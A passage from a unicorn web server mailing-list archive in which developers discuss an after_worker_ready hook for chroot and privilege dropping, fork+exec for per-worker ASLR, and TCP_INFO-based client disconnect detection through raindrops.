overriding a private method, I would use it.  I'm not sure there is a
way currently, which is why I worked on the patch.
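
For context, a rough sketch of the kind of thing the proposed hook
allows without overriding private methods (the chroot directory,
user and group names are hypothetical):

    after_worker_ready do |server, worker|
      server.logger.info("worker=#{worker.nr} ready, locking down")
      Dir.chroot('/var/www/app')
      Dir.chdir('/')
      worker.user('app_user', 'app_group')
    end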

> > >     So I'm wondering if there can be some of that which could be
> > >     trimmed out someday or made optional, somehow.
> > 
> > I'm not sure how open you are to a plugin-like system for Unicorn, where
> > you can have separate files for separate features, and users can choose
> > which features the want to use.  This limits memory usage so that you
> > don't pay a memory cost for features you don't use.  This is the
> > approach used by Sequel, Roda, and Rodauth (other libraries I maintain),
> > and if you are interested in a similar system for Unicorn, I would be
> > happy to work on one.
> 
> Not really.  As I've stated many times in the past, unicorn is
> just one of many servers available for Rack users; so I've been
> against people building too many dependencies on unicorn, that
> comes at the expense of other servers.
 
True, but there are features that only unicorn provides.  If you want
those features, you have to use unicorn anyway. 

> What I had in mind was having a shim process which does socket
> setup, user switching, etc. before exec-ing unicorn in cases
> where a systemd-like spawner is not used.  But it's probably too
> small to make an impact on real apps anyways, since Ruby still
> has tons of methods which never get called, either.

I could see that decreasing memory usage slightly, but I agree it's
unlikely to make a significant impact.

> > I do have a couple of additional patches I plan to send, but I think it
> > may be better to ask here first.
> > 
> > One is that SIGUSR1 handling doesn't work well with chroot if the log
> > file is outside of the chroot, since the worker process may not have
> > access to reopen the file.  One simple fix is to reopen the logs in
> > the master process, then send SIGQUIT instead of SIGUSR1 to the child
> > processes.  Are you open to a patch that does that?
> 
> Right now, the worker exits with some log spew if reopening
> logs fails, and the worker respawns anyways, correct?
> 
> Perhaps that mapping can be made automatic if chroot is
> enabled.  I wonder if that's too much magic...
> Or the log spew could be suppressed when the error
> is ENOENT and chroot is enabled.
> 
> The sysadmin could also send SIGHUP to reload everything
> and respawn all children.
> 
> So, I'm wondering if using SIGHUP is too much of a burden, or if
> automatic USR1 => QUIT mapping for chroot users is too magical.

SIGHUP is actually fine.  I didn't realize it reopened log files
in the master process, but apparently it does, so I can just use
SIGHUP instead of SIGUSR1.

> > The second feature is more exotic security feature called fork+exec.
> > The current issue with unicorn's direct forking of children is that
> > forked children share the memory layout of the server.  This is good
> > from a memory usage standpoint due to CoW memory.  However, if there
> > is a memory vulnerability in the unicorn application, this makes it
> > easier to exploit, since if the a unicorn worker process crashes, the
> > master process will fork a child with pretty much the same memory
> > layout.  This allows address space discovery attacks.  Using fork+exec,
> > each child process would have a unique address space for ASLR, on
> > most Unix-like systems (Linux, MacOS X, NetBSD, OpenBSD, Solaris).
> > There are additional security advantages from fork+exec on OpenBSD, but
> > all Unix-like systems that use ASLR can benefit from the unique
> > memory layout per process.
> 
> It depends how intrusive the implementation is...

That I don't know yet.  I haven't implemented fork+exec before, so I'm
not sure how many changes are needed. I probably won't be able to work
on this right away.

> Is this merely calling exec in the worker?
> 
> I'm not sure if your use of "fork+exec" is merely the two
> well-known syscalls combined, or if there's something else;
> I'll assume the former, since that's enough to have a
> unique address space for Ruby bytecode.
> 
> Can this be done in an after_fork/after_worker_ready hook?
> 
> Socket inheritance can be done the same way it handles USR2
> upgrades and systemd socket inheritance.

I expect in addition to socket inheritance, we will need to handle pipe
inheritance for the @to_io and @master pipes in the worker.

Thanks,
Jeremy

^ permalink raw reply	[relevance 0%]

* Re: Patch: Add after_worker_ready configuration option
  2017-02-23  3:43  1%   ` Jeremy Evans
@ 2017-02-23  9:23  2%     ` Eric Wong
  2017-02-23 20:00  0%       ` Jeremy Evans
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-23  9:23 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: unicorn-public

Jeremy Evans <code@jeremyevans.net> wrote:

<snip> acknowledging everything above.

> On 02/23 02:32, Eric Wong wrote:
> > Jeremy Evans <code@jeremyevans.net> wrote:
> > Anyways, I'm somewhat inclined to accept this as well, but will
> > think about it a bit, too.
> > 
> > One problem I have with this change is that it requires users
> > read more documentation and know more caveats to use.
>  
> It's unfortunate, but I think it's necessary in this case. Unicorn's
> default behavior works for most users, but this makes it so you
> don't have to override HttpServer#init_worker_process to get similar
> functionality.

Yeah.  Unfortunately, with every option comes more
support/maintenance overhead.  So I'm trying to make sure we've
explored every possible avenue before adding this new option.

<snip>

> > (*) Fwiw, I wasn't thrilled to add user switching to unicorn back
> >     in 2009/2010, as it should not need to run privileged ports.
> 
> I think had you not added it, there wouldn't be a need for a chroot
> patch, since otherwise one would assume any user that wanted to
> drop privileges would just run the necessary code themselves.
> 
> One thing to keep in mind is that if you did not add the user switching
> code, developers who need it would implement it themselves, and would
> likely miss things like initgroups.

Heh.  As I was mentioning above, every feature can come with
new, unintended consequences :>  But yeah, maybe push things
up to Ruby stdlib, or systemd...

> >     So I'm wondering if there can be some of that which could be
> >     trimmed out someday or made optional, somehow.
> 
> I'm not sure how open you are to a plugin-like system for Unicorn, where
> you can have separate files for separate features, and users can choose
> which features the want to use.  This limits memory usage so that you
> don't pay a memory cost for features you don't use.  This is the
> approach used by Sequel, Roda, and Rodauth (other libraries I maintain),
> and if you are interested in a similar system for Unicorn, I would be
> happy to work on one.

Not really.  As I've stated many times in the past, unicorn is
just one of many servers available for Rack users; so I've been
against people building too many dependencies on unicorn; that
comes at the expense of other servers.

What I had in mind was having a shim process which does socket
setup, user switching, etc. before exec-ing unicorn in cases
where a systemd-like spawner is not used.  But it's probably too
small to make an impact on real apps anyways, since Ruby still
has tons of methods which never get called, either.

> I do have a couple of additional patches I plan to send, but I think it
> may be better to ask here first.
> 
> One is that SIGUSR1 handling doesn't work well with chroot if the log
> file is outside of the chroot, since the worker process may not have
> access to reopen the file.  One simple fix is to reopen the logs in
> the master process, then send SIGQUIT instead of SIGUSR1 to the child
> processes.  Are you open to a patch that does that?

Right now, the worker exits with some log spew if reopening
logs fails, and the worker respawns anyways, correct?

Perhaps that mapping can be made automatic if chroot is
enabled.  I wonder if that's too much magic...
Or the log spew could be suppressed when the error
is ENOENT and chroot is enabled.

The sysadmin could also send SIGHUP to reload everything
and respawn all children.

So, I'm wondering if using SIGHUP is too much of a burden, or if
automatic USR1 => QUIT mapping for chroot users is too magical.

(trying to avoid adding more options + documentation, as always :)

> The second feature is more exotic security feature called fork+exec.
> The current issue with unicorn's direct forking of children is that
> forked children share the memory layout of the server.  This is good
> from a memory usage standpoint due to CoW memory.  However, if there
> is a memory vulnerability in the unicorn application, this makes it
> easier to exploit, since if the a unicorn worker process crashes, the
> master process will fork a child with pretty much the same memory
> layout.  This allows address space discovery attacks.  Using fork+exec,
> each child process would have a unique address space for ASLR, on
> most Unix-like systems (Linux, MacOS X, NetBSD, OpenBSD, Solaris).
> There are additional security advantages from fork+exec on OpenBSD, but
> all Unix-like systems that use ASLR can benefit from the unique
> memory layout per process.

It depends how intrusive the implementation is...

Is this merely calling exec in the worker?

I'm not sure if your use of "fork+exec" is merely the two
well-known syscalls combined, or if there's something else;
I'll assume the former, since that's enough to have a
unique address space for Ruby bytecode.

Can this be done in an after_fork/after_worker_ready hook?

Socket inheritance can be done the same way it handles USR2
upgrades and systemd socket inheritance.

^ permalink raw reply	[relevance 2%]

* Re: check_client_connection using getsockopt(2)
  2017-02-23  2:42  0%       ` Simon Eskildsen
@ 2017-02-23  3:52  2%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-02-23  3:52 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
> On Wed, Feb 22, 2017 at 8:42 PM, Eric Wong <e@80x24.org> wrote:
> > Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
> >> I meant to ask, in Raindrops why do you use the netlink API to get the
> >> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
> >> `tcpi_unacked`? (as described in
> >> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
> >> monitor socket backlogs with a sidekick Ruby daemon. Although we're
> >> looking to replace it with a middleware to simplify for Kubernetes.
> >> It's one of our main metrics for monitoring performance, especially
> >> around deploys.
> >
> > The netlink API allows independently-spawned processes to
> > monitor others; so it can be system-wide.  TCP_INFO requires the
> > process doing the checking to also have the socket open.
> >
> > I guess this reasoning for using netlink is invalid for containers,
> > though...
> 
> If you namespace the network it's problematic, yeah. I'm considering
> right now putting Raindrops in a middleware with the netlink API
> inside the container, but it feels weird. That said, if you consider
> the alternative of using `getsockopt(2)` on the listening socket, I
> don't know how you'd get access to the Unicorn listening socket from a
> middleware. Would it be nuts to expose a hook in Unicorn that allows
> periodic execution for monitoring listening stats from Raindrops on
> the listening socket? It seems somewhat of a narrow use-case, but on
> the other hand I'm also not a fan of doing
> `Raindrops::Linux.tcp_listener_stats("localhost:#{ENV["PORT"]}")`, but
> that might be less ugly.

Yeah, all options get pretty ugly since Rack doesn't expose that
in a standardized way.  Unicorn::HttpServer::LISTENERS is a
historical constant which stores all listeners and is used by
some parts of raindrops.

Maybe relying on ObjectSpace or walking the LISTEN_FDS env from
systemd is acceptable for other servers *shrug*


Another way might be to rely on tcpi_last_data_recv in struct
tcp_info from each and every client socket.  That should tell
you when a client stopped writing to the socket, which works for
most HTTP requests.  You could use the same getsockopt() call
you'd use for check_client_connection to read that field.

However, this won't be visible until the client is accept()ed.

raindrops actually has some support for this, but it was
ugly, too (hooking into *accept* methods):
https://bogomips.org/raindrops/Raindrops/LastDataRecv.html

Perhaps refinements could be used, nowadays (I've never used
them).  Just throwing options out there...
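
(A very rough sketch of that getsockopt() route, assuming Linux and
raindrops; this is not something unicorn does today:)

  require 'raindrops'

  # milliseconds since an accepted client last sent us data
  def ms_since_last_data_recv(client)
    Raindrops::TCP_Info.new(client).last_data_recv
  end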


In any case, what I definitely do not want is to introduce more
specialized configuration or APIs which might lock people into
unicorn or burden people with versioning incompatibilities.

> > (*) So I've been wondering if adding a "unicorn-mode" to an
> >     existing C10K, slow-client-capable Ruby/Rack server +
> >     reverse proxy makes sense for containerized deploys.
> >     Maybe...
> 
> I'd love to hear more about this idea. What are you contemplating?

Maybe another time, and not on the unicorn list.  I don't feel
comfortable writing about unrelated/tangential projects on the
unicorn list, even if I'm the leader of both projects.  Anyways,
this other server is also in the rack README.md and I've been
announcing it on ruby-talk since 2013.

^ permalink raw reply	[relevance 2%]

* Re: Patch: Add after_worker_ready configuration option
  @ 2017-02-23  3:43  1%   ` Jeremy Evans
  2017-02-23  9:23  2%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jeremy Evans @ 2017-02-23  3:43 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On 02/23 02:32, Eric Wong wrote:
> Jeremy Evans <code@jeremyevans.net> wrote:
> > This adds a hook that is called after the application has
> > been loaded by the worker process, directly before it starts
> > accepting requests.  This hook is necessary if your application
> > needs to gain access to resources during initialization,
> > and then drop privileges before serving requests.
> > 
> > This is especially useful in conjunction with chroot support
> > so the app can load all the normal ruby libraries it needs
> > to function, and then chroot before accepting requests.
> > 
> > If you are preloading the app, it's possible to drop privileges
> > or chroot in after_fork, but if you are not preloading the app,
> > there is not currently a proper place to handle this, hence
> > the reason for this feature.
> 
> This means using Unicorn::Worker#user directly,
> and not Unicorn::Configurator#user.  OK...

Correct.  We could add configuration support to specify when to call
Worker#user, but that seems like overkill.
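
To make the intended usage concrete, something like this in the
config file (a sketch; it assumes both this hook and the pending
chroot argument to Worker#user from the other thread):

  working_directory '/var/www/app'  # becomes the chroot below
  after_worker_ready do |server, worker|
    server.logger.info("worker #{worker.nr} ready, dropping privileges")
    worker.user('www', 'www', true) # third arg requests chroot (pending patch)
  end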
 
> Also, were you planning to send a v2 for chroot support?
> I'm fine with either.

Sorry about that, I will send a v2 for chroot support tomorrow.

> 
> > --- a/lib/unicorn/configurator.rb
> > +++ b/lib/unicorn/configurator.rb
> 
> > @@ -162,7 +165,7 @@ def after_fork(*args, &block)
> >    # sets after_worker_exit hook to a given block.  This block will be called
> >    # by the master process after a worker exits:
> >    #
> > -  #  after_fork do |server,worker,status|
> > +  #  after_worker_exit do |server,worker,status|
> >    #    # status is a Process::Status instance for the exited worker process
> >    #    unless status.success?
> >    #      server.logger.error("worker process failure: #{status.inspect}")
> 
> This looks like an unrelated hunk which belongs in a separate
> patch.  I can squeeze in a separate fix for this (credited to
> you) or you can send a separate patch.
 
Correct, this was an unrelated bug in my last patch.  I'll separate this
hunk into a separate patch.

> > @@ -172,6 +175,18 @@ def after_worker_exit(*args, &block)
> >      set_hook(:after_worker_exit, block_given? ? block : args[0], 3)
> >    end
> >  
> > +  # sets after_worker_ready hook to a given block.  This block will be called
> > +  # by a worker process after it has been fully loaded, directly before it
> > +  # starts responding to requests:
> > +  #
> > +  #  after_worker_ready do |server,worker|
> > +  #    server.logger.info("worker #{worker.nr} ready, dropping privileges")
> > +  #    worker.user('username', 'groupname')
> > +  #  end
> 
> The documentation should probably say something along the lines
> of:
> 
>     Do not use Unicorn::Configurator#user if you rely on
>     changing users in the after_worker_ready hook.
> 
> And maybe corresponding documentation for Unicorn::Configurator#user,
> too.

OK, I'll update the documentation to be more complete.

> Anyways, I'm somewhat inclined to accept this as well, but will
> think about it a bit, too.
> 
> One problem I have with this change is that it requires users
> read more documentation and know more caveats to use.
 
It's unfortunate, but I think it's necessary in this case. Unicorn's
default behavior works for most users, but this makes it so you
don't have to override HttpServer#init_worker_process to get similar
functionality.

> Adding to that, Unicorn::Configurator#user has been favored
> (documentation-wise) over Unicorn::Worker#user in the past;
> so it's a bit of a reversal(*)

I think Configurator#user still makes sense for most users.  As the
documentation mentions, directly calling Worker#user should only
be done if Configurator#user is not sufficient.
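
(i.e. the common case stays a one-liner in the config file:

  user 'nobody', 'nogroup' # Configurator#user, applied in each worker

while calling Worker#user directly is only for hooks that need to
control the timing themselves.)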

> Based on the series of changes you're making, I'm sensing you're
> working on some complex system which might need more security
> than a typical app.

These patches are related to all applications using Unicorn that I run
on OpenBSD (about 20 separate applications).  They are designed
to reduce the attack surface if an attacker is able to find a
remote code execution vulnerability in one of the applications.

In addition to chroot(2), after chrooting, these applications also
use pledge(2), which is an OpenBSD-specific system call filter
(similar in principle to seccomp(2) in Linux).
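
(For illustration only, that step could look roughly like this from
Ruby, assuming a binding such as the pledge gem where Pledge.pledge
takes a promises string; the promise list here is made up:)

  require 'pledge'

  after_worker_ready do |server, worker|
    worker.user('www', 'www', true)        # drop root + chroot first
    Pledge.pledge('stdio rpath inet unix') # then restrict available syscalls
  end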

> I know you use OpenBSD, and I don't know much about the init
> system or how deployment works, there.
 
It's a very simple sh(1)-based init system, similar to traditional Unix.
Most OpenBSD system daemons will start as root, chroot to a specific
directory, drop privileges (possibly separate privileges in separate
daemon processes connected via IPC), and finally use pledge(2) to limit
what each process can actually use in terms of system calls.

> Nowadays, it seems more common things (binding sockets,
> switching users, chrooting, etc..) is handled by init systems
> (at least systemd); and having that functionality in unicorn
> would mean redundant bloat.

I believe only Linux uses a systemd-like approach, and while most
Linux systems use systemd these days, usage is not universal
(notable exceptions are Slackware, Void, and Gentoo).  But my
knowledge of other operating systems is not very broad.

> It would be useful to me and folks who won't use these features
> to understand how and why they're used.  That can help justify
> the (admittedly small) memory overhead which comes with it.

True.  I'm sorry the commit messages didn't provide a more thorough
explanation.  I will try to improve that in the future.

> (*) Fwiw, I wasn't thrilled to add user switching to unicorn back
>     in 2009/2010, as it should not need to run privileged ports.

I think had you not added it, there wouldn't be a need for a chroot
patch, since otherwise one would assume any user that wanted to
drop privileges would just run the necessary code themselves.

One thing to keep in mind is that if you did not add the user switching
code, developers who need it would implement it themselves, and would
likely miss things like initgroups.

>     So I'm wondering if there can be some of that which could be
>     trimmed out someday or made optional, somehow.

I'm not sure how open you are to a plugin-like system for Unicorn, where
you can have separate files for separate features, and users can choose
which features they want to use.  This limits memory usage so that you
don't pay a memory cost for features you don't use.  This is the
approach used by Sequel, Roda, and Rodauth (other libraries I maintain),
and if you are interested in a similar system for Unicorn, I would be
happy to work on one.

I do have a couple of additional patches I plan to send, but I think it
may be better to ask here first.

One is that SIGUSR1 handling doesn't work well with chroot if the log
file is outside of the chroot, since the worker process may not have
access to reopen the file.  One simple fix is to reopen the logs in
the master process, then send SIGQUIT instead of SIGUSR1 to the child
processes.  Are you open to a patch that does that?

The second feature is a more exotic security feature called fork+exec.
The current issue with unicorn's direct forking of children is that
forked children share the memory layout of the server.  This is good
from a memory usage standpoint due to CoW memory.  However, if there
is a memory vulnerability in the unicorn application, this makes it
easier to exploit, since if a unicorn worker process crashes, the
master process will fork a child with pretty much the same memory
layout.  This allows address space discovery attacks.  Using fork+exec,
each child process would have a unique address space for ASLR, on
most Unix-like systems (Linux, MacOS X, NetBSD, OpenBSD, Solaris).
There are additional security advantages from fork+exec on OpenBSD, but
all Unix-like systems that use ASLR can benefit from the unique
memory layout per process.
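
(To illustrate the distinction in plain Ruby, outside of unicorn: a
plain fork keeps the parent's address-space layout via CoW, while an
exec after the fork gives the child a freshly randomized image:)

  # plain fork: child shares the parent's layout
  pid = fork { sleep 0.1 }   # stand-in for real worker code
  Process.wait(pid)

  # fork+exec: exec replaces the image, so ASLR lays it out anew
  pid = fork { exec('ruby', '-e', 'sleep 0.1') }
  Process.wait(pid)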

Thanks,
Jeremy

^ permalink raw reply	[relevance 1%]

* Re: check_client_connection using getsockopt(2)
  2017-02-23  1:42  2%     ` Eric Wong
@ 2017-02-23  2:42  0%       ` Simon Eskildsen
  2017-02-23  3:52  2%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-23  2:42 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, raindrops-public

On Wed, Feb 22, 2017 at 8:42 PM, Eric Wong <e@80x24.org> wrote:
> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>
> <snip> Thanks for the writeup!
>
> Another sidenote: It seems nginx <-> unicorn is a bit odd
> for deployment in a containerized environment(*).
>
>> I meant to ask, in Raindrops why do you use the netlink API to get the
>> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
>> `tcpi_unacked`? (as described in
>> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
>> monitor socket backlogs with a sidekick Ruby daemon. Although we're
>> looking to replace it with a middleware to simplify for Kubernetes.
>> It's one of our main metrics for monitoring performance, especially
>> around deploys.
>
> The netlink API allows independently-spawned processes to
> monitor others; so it can be system-wide.  TCP_INFO requires the
> process doing the checking to also have the socket open.
>
> I guess this reasoning for using netlink is invalid for containers,
> though...

If you namespace the network it's problematic, yeah. I'm considering
right now putting Raindrops in a middleware with the netlink API
inside the container, but it feels weird. That said, if you consider
the alternative of using `getsockopt(2)` on the listening socket, I
don't know how you'd get access to the Unicorn listening socket from a
middleware. Would it be nuts to expose a hook in Unicorn that allows
periodic execution for monitoring listening stats from Raindrops on
the listening socket? It seems somewhat of a narrow use-case, but on
the other hand I'm also not a fan of doing
> `Raindrops::Linux.tcp_listener_stats("localhost:#{ENV["PORT"]}")`, but
that might be less ugly.

>
>> I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
> you could also do `env.delete("rack.hijack_io")` after hijacking to allow
>> Unicorn to still render the response. Unfortunately the
>> `<webserver>.socket` key is not part of the Rack standard, so I'm
>> hesitant to use it. When this gets into Unicorn I'm planning to
>> propose it upstream to Puma as well.
>
> I was going to say env.delete("rack.hijack_io") is dangerous
> (since env could be copied by middleware); but apparently not:
> rack.hijack won't work with a copied env, either.
> You only need to delete with the same env object you call
> rack.hijack with.
>
> But calling rack.hijack followed by env.delete may still
> have unintended side-effects in other servers; so I guess
> we (again) cannot rely on hijack working portably.

Exactly, it gives the illusion of portability but e.g. Puma stores an
instance variable to check whether a middleware hijacked, rendering
the `env#delete` option useless.

>
>> Cool. How would you suggest I check for TCP_INFO compatible platforms
>> in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
>> or do you prefer another mechanism? I agree that we should fall back
>> to the write hack on other platforms.
>
> The Raindrops::TCP_Info class should be undefined on unsupported
> platforms, so I think you can check for that, instead.  Then it
> should be transparent to add FreeBSD support from unicorn's
> perspective.

Perfect. I'll start working on a patch.

>
>
> (*) So I've been wondering if adding a "unicorn-mode" to an
>     existing C10K, slow-client-capable Ruby/Rack server +
>     reverse proxy makes sense for containerized deploys.
>     Maybe...

I'd love to hear more about this idea. What are you contemplating?

^ permalink raw reply	[relevance 0%]

* Re: check_client_connection using getsockopt(2)
  2017-02-22 20:09  2%   ` Simon Eskildsen
@ 2017-02-23  1:42  2%     ` Eric Wong
  2017-02-23  2:42  0%       ` Simon Eskildsen
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-23  1:42 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:

<snip> Thanks for the writeup!

Another sidenote: It seems nginx <-> unicorn is a bit odd
for deployment in a containerized environment(*).

> I meant to ask, in Raindrops why do you use the netlink API to get the
> socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
> `tcpi_unacked`? (as described in
> http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
> monitor socket backlogs with a sidekick Ruby daemon. Although we're
> looking to replace it with a middleware to simplify for Kubernetes.
> It's one of our main metrics for monitoring performance, especially
> around deploys.

The netlink API allows independently-spawned processes to
monitor others; so it can be system-wide.  TCP_INFO requires the
process doing the checking to also have the socket open.

I guess this reasoning for using netlink is invalid for containers,
though...

> I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
> you could also do `env.delete("rack.hijack_io")` after hijacking to allow
> Unicorn to still render the response. Unfortunately the
> `<webserver>.socket` key is not part of the Rack standard, so I'm
> hesitant to use it. When this gets into Unicorn I'm planning to
> propose it upstream to Puma as well.

I was going to say env.delete("rack.hijack_io") is dangerous
(since env could be copied by middleware); but apparently not:
rack.hijack won't work with a copied env, either.
You only need to delete with the same env object you call
rack.hijack with.

But calling rack.hijack followed by env.delete may still
have unintended side-effects in other servers; so I guess
we (again) cannot rely on hijack working portably.

> Cool. How would you suggest I check for TCP_INFO compatible platforms
> in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
> or do you prefer another mechanism? I agree that we should fall back
> to the write hack on other platforms.

The Raindrops::TCP_Info class should be undefined on unsupported
platforms, so I think you can check for that, instead.  Then it
should be transparent to add FreeBSD support from unicorn's
perspective.


(*) So I've been wondering if adding a "unicorn-mode" to an
    existing C10K, slow-client-capable Ruby/Rack server +
    reverse proxy makes sense for containerized deploys.
    Maybe...

^ permalink raw reply	[relevance 2%]

* Re: check_client_connection using getsockopt(2)
  2017-02-22 18:33  2% ` Eric Wong
@ 2017-02-22 20:09  2%   ` Simon Eskildsen
  2017-02-23  1:42  2%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Simon Eskildsen @ 2017-02-22 20:09 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, raindrops-public

On Wed, Feb 22, 2017 at 1:33 PM, Eric Wong <e@80x24.org> wrote:
> Simon Eskildsen <simon.eskildsen@shopify.com> wrote:
>
> <snip> great to know it's still working after all these years :>
>
>> This confirms Eric's comment that the existing
>> `check_client_connection` works perfectly on loopback, but as soon as
>> you put an actual network between the Unicorn and client—it's only
>> effective 20% of the time, even with `TCP_NODELAY`. I'm assuming, due
>> to buffering, even when disabling Nagle's. As we're changing our
>> architecture, we move from ngx (lb) -> ngx (host) -> unicorn to ngx
>> (lb) -> unicorn. That means this patch will no longer work for us.
>
> Side comment: I'm a bit curious how you guys arrived at removing
> nginx at the host level (if you're allowed to share that info)
>
> I've mainly kept nginx on the same host as unicorn, but used
> haproxy or similar (with minimal buffering) at the LB level.
> That allows better filesystem load distribution for large uploads.


Absolutely. We're starting to experiment with Kubernetes, and as a
result we're interested in simplifying ingress as much as possible. We
could still run them, but if I can avoid explaining why they're there
for the next 5 years—I'll be happy :) As I see it, the current
use-cases we have for the host nginx are (with why we can get rid of
each):

* Keepalive between edge nginx LBs and host LBs to avoid excessive
network traffic. This is not a deal-breaker, so we'll just ignore this
problem. It's a _massive_ amount of traffic normally though.
* Out of rotation. We take nodes gracefully out of rotation by
touching a file that'll return 404 on a health-checking endpoint from
the edge LBs. Kubernetes implements this by just removing all the
containers on that node.
* Graceful deploys. When we deploy with containers, we take each
container out of rotation with the local host Nginx, wait for it to
come up, and put it back in rotation. We don't utilize Unicorn's
graceful restarts because we want a Ruby upgrade deploy (replacing the
container) to be the same as an updated code rollout.
* File uploads. As you mention, currently we load-balance this between
them. I haven't finished the investigation on whether this is feasible
on the front LBs. Otherwise we may go for a 2-tier Nginx solution or
expand the edge. However, with Kubernetes I'd really like to avoid
having host nginxes. It's not very native to the Kubernetes paradigm.
Does it balance across the network, or only to the pods on that node?
* check_client_connection working. :-) This thread.

Slow clients and other advantages we find from the edge Nginxes.

>> I propose instead of the early `write(2)` hack, that we use
>> `getsockopt(2)` with the `TCP_INFO` flag and read the state of the
>> socket. If it's in `CLOSE_WAIT` or `CLOSE`, we kill the connection and
>> move on to the next.
>>
>> https://github.com/torvalds/linux/blob/8fa3b6f9392bf6d90cb7b908e07bd90166639f0a/include/uapi/linux/tcp.h#L163
>>
>> This is not going to be portable, but we can do this on only Linux
>> which I suspect is where most production deployments of Unicorn that
>> would benefit from this feature run. It's not useful in development
>> (which is likely more common to not be Linux). We could also introduce
>> it under a new configuration option if desired. In my testing, this
>> works to reject 100% of requests early when not on loopback.
>
> Good to know about its effectiveness!  I don't mind adding
> Linux-only features as long as existing functionality still
> works on the server-oriented *BSDs.
>
>> The code is essentially:
>>)?
>> def client_closed?
>>   tcp_info = socket.getsockopt(Socket::SOL_TCP, Socket::TCP_INFO)
>>   state = tcp_info.unpack("c")[0]
>>   state == TCP_CLOSE || state == TCP_CLOSE_WAIT
>> end
>
> +Cc: raindrops-public@bogomips.org -> https://bogomips.org/raindrops-public/
>
> Fwiw, raindrops (already a dependency of unicorn) has TCP_INFO
> support under Linux:
>
> https://bogomips.org/raindrops.git/tree/ext/raindrops/linux_tcp_info.c
>
> I haven't used it, much, but FreeBSD also implements a subset of
> this feature, nowadays, and ought to be supportable, too.  We
> can look into adding it for raindrops.

Cool, I think it makes sense to use Raindrops here, advantage being
it'd use the actual struct instead of a sketchy `#unpack`.

I meant to ask, in Raindrops why do you use the netlink API to get the
socket backlog instead of `getsockopt(2)` with `TCP_INFO` to get
`tcpi_unacked`? (as described in
http://www.ryanfrantz.com/posts/apache-tcp-backlog/) We use this to
monitor socket backlogs with a sidekick Ruby daemon. Although we're
looking to replace it with a middleware to simplify for Kubernetes.
It's one of our main metrics for monitoring performance, especially
around deploys.

>
> I don't know about other BSDs...
>
>> This could be called at the top of `#process_client` in `http_server.rb`.
>>
>> Would there be interest in this upstream? Any comments on this
>> proposed implementation? Currently, we're using a middleware with the
>> Rack hijack API, but this seems like it belongs at the webserver
>> level.
>
> I guess hijack means you have to discard other middlewares and
> the normal rack response handling in unicorn?  If so, ouch!
>
> Unfortunately, without hijack, there's no portable way in Rack
> to get at the underlying IO object; so I guess this needs to
> be done at the server level...
>
> So yeah, I guess it belongs in the webserver.

I was going to use `env["unicorn.socket"]`/`env["puma.socket"]`, but
you could also do `env.delete("rack.hijack_io")` after hijacking to allow
Unicorn to still render the response. Unfortunately the
`<webserver>.socket` key is not part of the Rack standard, so I'm
hesitant to use it. When this gets into Unicorn I'm planning to
propose it upstream to Puma as well.

>
> I think we can automatically use TCP_INFO if available for
> check_client_connection; then fall back to the old early write
> hack for Unix sockets and systems w/o TCP_INFO (which would set
> the response_start_sent flag).
>
> No need to introduce yet another configuration option.

Cool. How would you suggest I check for TCP_INFO compatible platforms
in Unicorn? Is `RUBY_PLATFORM.ends_with?("linux".freeze)` sufficient
or do you prefer another mechanism? I agree that we should fall back
to the write hack on other platforms.

^ permalink raw reply	[relevance 2%]

* Re: check_client_connection using getsockopt(2)
  @ 2017-02-22 18:33  2% ` Eric Wong
  2017-02-22 20:09  2%   ` Simon Eskildsen
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-22 18:33 UTC (permalink / raw)
  To: Simon Eskildsen; +Cc: unicorn-public, raindrops-public

Simon Eskildsen <simon.eskildsen@shopify.com> wrote:

<snip> great to know it's still working after all these years :>

> This confirms Eric's comment that the existing
> `check_client_connection` works perfectly on loopback, but as soon as
> you put an actual network between the Unicorn and client—it's only
> effective 20% of the time, even with `TCP_NODELAY`. I'm assuming, due
> to buffering, even when disabling Nagle's. As we're changing our
> architecture, we move from ngx (lb) -> ngx (host) -> unicorn to ngx
> (lb) -> unicorn. That means this patch will no longer work for us.

Side comment: I'm a bit curious how you guys arrived at removing
nginx at the host level (if you're allowed to share that info)

I've mainly kept nginx on the same host as unicorn, but used
haproxy or similar (with minimal buffering) at the LB level.
That allows better filesystem load distribution for large uploads.

> I propose instead of the early `write(2)` hack, that we use
> `getsockopt(2)` with the `TCP_INFO` flag and read the state of the
> socket. If it's in `CLOSE_WAIT` or `CLOSE`, we kill the connection and
> move on to the next.
> 
> https://github.com/torvalds/linux/blob/8fa3b6f9392bf6d90cb7b908e07bd90166639f0a/include/uapi/linux/tcp.h#L163
> 
> This is not going to be portable, but we can do this on only Linux
> which I suspect is where most production deployments of Unicorn that
> would benefit from this feature run. It's not useful in development
> (which is likely more common to not be Linux). We could also introduce
> it under a new configuration option if desired. In my testing, this
> works to reject 100% of requests early when not on loopback.

Good to know about its effectiveness!  I don't mind adding
Linux-only features as long as existing functionality still
works on the server-oriented *BSDs.

> The code is essentially:
> 
> def client_closed?
